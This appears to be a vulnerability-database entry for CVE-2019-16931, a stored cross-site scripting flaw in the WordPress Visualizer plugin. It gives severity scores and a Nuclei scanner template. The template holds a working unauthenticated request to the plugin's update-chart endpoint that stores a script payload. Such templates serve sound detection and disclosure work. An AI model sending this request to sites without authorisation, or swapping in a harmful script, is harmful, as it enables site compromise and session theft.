Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-16931
HistoryMay 11, 2022 - 6:26 a.m.

WordPress Visualizer <3.3.1 - Cross-Site Scripting

2022-05-1106:26:12
ProjectDiscovery
github.com
3

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

52.9%

WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
id: CVE-2019-16931

info:
  name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
    - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
    - https://wpvulndb.com/vulnerabilities/9893
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
    - https://wordpress.org/plugins/visualizer/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-16931
    cwe-id: CWE-79
    epss-score: 0.0016
    epss-percentile: 0.52613
    cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: themeisle
    product: visualizer
    framework: wordpress
  tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan,themeisle

http:
  - raw:
      - |
        POST /wp-json/visualizer/v1/update-chart HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id": 7, "visualizer-chart-type": "<script>alert(document.domain)</script>"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":"Chart updated"}'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e9cefe4abc7fdad019d98919e8ef9f74edc413f523bc8300b344f6ad14137b8802203abbab9c423759cadf12903e6cf4b107694f8563d6a3ca13e2e3ed5aa61f41e1:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

52.9%

Related for NUCLEI:CVE-2019-16931